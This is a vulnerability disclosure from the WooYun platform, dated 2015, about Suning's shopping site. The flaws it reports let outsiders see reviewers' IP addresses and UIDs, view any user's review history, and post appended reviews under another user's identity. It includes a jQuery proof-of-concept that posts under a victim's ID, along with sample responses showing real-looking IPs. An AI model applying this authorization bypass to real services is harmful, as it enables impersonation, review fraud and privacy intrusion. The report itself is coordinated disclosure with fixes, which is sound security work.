当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108987

漏洞标题:苏宁易购2处平行权限+1个用户信息泄露(可刷虚假评价)

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: 路人甲

提交时间:2015-04-19 13:03

修复时间:2015-06-03 16:14

公开时间:2015-06-03 16:14

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-19: 细节已通知厂商并且等待厂商处理中
2015-04-19: 厂商已经确认,细节仅向厂商公开
2015-04-29: 细节向核心白帽子及相关领域专家公开
2015-05-09: 细节向普通白帽子公开
2015-05-19: 细节向实习白帽子公开
2015-06-03: 细节向公众公开

简要描述:

苏宁第三方的商品千万不敢给差评了...

详细说明:

获取商品评论信息接口是
http://zone.suning.com/review/json/product_reviews/000000000126148820--total-g-810999---3-4-getItem.html?callback=getItem
此接口返回的数据格式化后如下

{
"success": true,
"data": {
"reviews": [
{
"id": 55615884,
"content": "速度快,东西好",
"contentLength": 7,
"replyCount": 0,
"usefulVoteCount": 0,
"publishIp": "223.104.4.103",
"publishTime": "2015-04-04 18:32:30",
"publishDeviceId": 5,
"anonymousFlag": 1,
"userId": "6098337491",
"user": {
"province": "",
"birthday": "",
"constellation": "",
"id": "6098337491",
"nickName": "1***8",
"gender": "",
"typeId": "1",
"imageUrl": "http://image.suning.cn/uimg/cmf/cust_headpic/0000000000_01_60x60.jpg",
"levelId": "161000000010",
"levelName": "普通会员"
},
"status": 0,
"score": 5,
"bestFlag": false,
"storeFlag": false,
"storeId": "SN_001",
"store": {
"id": "SN_001",
"name": "苏宁自营"
},
"againReviewFlag": false,
"showOrderFlag": false,
"productId": "000000000126148820",
"product": {
"name": "亚马逊Kindle voyage 6英寸高级电子书阅读器 标准版 墨水屏 黑色",
"oldId": "25474860",
"brandId": "00005G950",
"brandName": "亚马逊(amazon)",
"imageCount": 0,
"firstCategoryId": "157122",
"secondCategoryId": "258003",
"thirdCategoryId": "258006",
"purchaseCategory": "10051",
"id": "000000000126148820"
},
"replyList": [],
"labels": [],
"orderItemId": 10082295095,
"supplierName": "苏宁自营",
"orderTime": "2015-04-03 15:58:13",
"logonId": "139*****18"
},
{
"id": 55611420,
"content": "这个还可以",
"contentLength": 5,
"replyCount": 0,
"usefulVoteCount": 0,
"publishIp": "61.148.242.67",
"publishTime": "2015-04-04 15:49:14",
"publishDeviceId": 2,
"anonymousFlag": 0,
"userId": "6013127526",
"user": {
"province": "",
"birthday": "",
"constellation": "",
"id": "6013127526",
"nickName": "186*****37",
"gender": "",
"typeId": "1",
"imageUrl": "http://image.suning.cn/uimg/cmf/cust_headpic/0000000000_01_60x60.jpg",
"levelId": "161000000010",
"levelName": "普通会员"
},
"status": 0,
"score": 5,
"bestFlag": false,
"storeFlag": false,
"store": {
"id": "SN_001",
"name": "苏宁自营"
},
"againReviewFlag": false,
"showOrderFlag": false,
"productId": "000000000126148820",
"product": {
"name": "亚马逊Kindle voyage 6英寸高级电子书阅读器 标准版 墨水屏 黑色",
"oldId": "25474860",
"brandId": "00005G950",
"brandName": "亚马逊(amazon)",
"imageCount": 0,
"firstCategoryId": "157122",
"secondCategoryId": "258003",
"thirdCategoryId": "258006",
"purchaseCategory": "10051",
"id": "000000000126148820"
},
"replyList": [],
"labels": [],
"orderItemId": 99999999999999,
"logonId": "186*****37"
},
{
"id": 55425631,
"title": "",
"content": "外观精致,体验很舒服。",
"contentLength": 11,
"replyCount": 0,
"usefulVoteCount": 0,
"publishIp": "171.111.40.70",
"publishTime": "2015-04-02 01:12:07",
"publishDeviceId": 1,
"anonymousFlag": 0,
"userId": "5202247450",
"user": {
"province": "",
"birthday": "",
"constellation": "",
"id": "5202247450",
"nickName": "139*****22",
"gender": "",
"typeId": "1",
"imageUrl": "http://image.suning.cn/uimg/cmf/cust_headpic/0000000000_01_60x60.jpg",
"levelId": "161000000010",
"levelName": "普通会员"
},
"status": 0,
"score": 5,
"bestFlag": false,
"storeFlag": false,
"storeId": "SN_001",
"store": {
"id": "SN_001",
"name": "苏宁自营"
},
"againReviewFlag": false,
"showOrderFlag": false,
"productId": "000000000126148820",
"product": {
"name": "亚马逊Kindle voyage 6英寸高级电子书阅读器 标准版 墨水屏 黑色",
"oldId": "25474860",
"brandId": "00005G950",
"brandName": "亚马逊(amazon)",
"imageCount": 0,
"firstCategoryId": "157122",
"secondCategoryId": "258003",
"thirdCategoryId": "258006",
"purchaseCategory": "10051",
"id": "000000000126148820"
},
"replyList": [],
"labels": [
{
"id": "14127037",
"name": "待机长",
"uniqueId": "216",
"reviewId": "55425631",
"status": 1
}
],
"orderItemId": 4075900887,
"supplierName": "苏宁自营",
"orderTime": "2015-03-12 00:42:55",
"logonId": "139*****22"
}
],
"attributes": {
"productId": "000000000126148820",
"nineProductId": "126148820",
"color": "",
"version": "",
"colorList": [],
"versionList": []
}
}
}


其中data['reviews'][0]['id'] 是此条评论的id,data['reviews'][0]['content']是评论内容data['reviews'][0]['publishIp']是评论者IP,data['reviews'][0]['userId']是评论者的UID
此接口泄露用户的IP和UID
使用UID在http://zone.suning.com/me/review/6098337491.htm 处可以进入该用户的主页,如果该用户有未匿名的评价/晒单会显示出来。
接下来是平行权限了
http://zone.suning.com/me/self-review/6098337491-1.htm
此接口是用户在进入自己主页时调用的,显示自己所有的评价商品,但是没做权限验证,可以直接查看他人的所有评价商品。还可以“追加评价”哟
在登录任意账号状态下,调用如下函数即可以其他用户的身份追评【pid是评论id,uid是其他用户的id,ct是评价内容】

function append(pid, uid, ct) {
var aurl = "http://zone.suning.com/me/ajax/appendReview.htm";
$.ajax({
url: aurl,
type: "POST",
dataType: 'jsonp',
async: false,
data: {
content: ct,
reviewId: pid,
cmfUserId: uid
},
success: {
function (data) {
if (data.returnCode == 0) {
alert('success');
return;
} else if (data.returnCode == 2) {
alert('黑名单用户');
return;
} else if (data.returnCode == 1) {
alert('河蟹');
return;
} else if (data.returnCode == -2) {
alert('异常');
return;
}
}
}
});
}


我试了给http://product.suning.com/126148820.html 评价第三页第二个用户追评,在评价页看不到追评内容,但是在用户自己视角下【http://zone.suning.com/me/self-review/6085490581-1.htm】是可以看到追评内容的

漏洞证明:

泄露用户UID和IP就不截图证明了。
这个是越权查看uid为6098337491用户所有评论商品的截图[当然,由于该用户只买了kindle,所以截图只有一件商品]

s.png


这个是越权在uid为6085490581用户评论里追加评论的截图

z.png

修复方案:

1.在商品评论接口去掉IP字段,以防差评后商家跨省
2.在商品评论接口对匿名评价用户去掉uid字段
3.对用户查看自己所有评价的页面验证用户权限
4.对追加评论,修改匿名状态等接口进行权限验证

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-04-19 16:12

厂商回复:

感谢提交,周一转交应用部门处理。

最新状态:

2015-05-27:稍后送上苏宁易购1000元礼品卡。

2015-06-08:请路人甲站内留下联系方式,以便发放礼品卡,谢谢。


漏洞评价:

评论

  1. 2015-06-03 16:20 | sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)

    直接给1000元,真好,这个厂商我也要去

  2. 2015-06-03 16:32 | 我能拒绝么 ( 路人 | Rank:10 漏洞数:3 | 疯爆志林)

    甲鱼你敢用,小心把你揪出来了

  3. 2015-06-03 18:37 | llkoio ( 路人 | Rank:20 漏洞数:3 | 热爱网络安全!)

    周一见!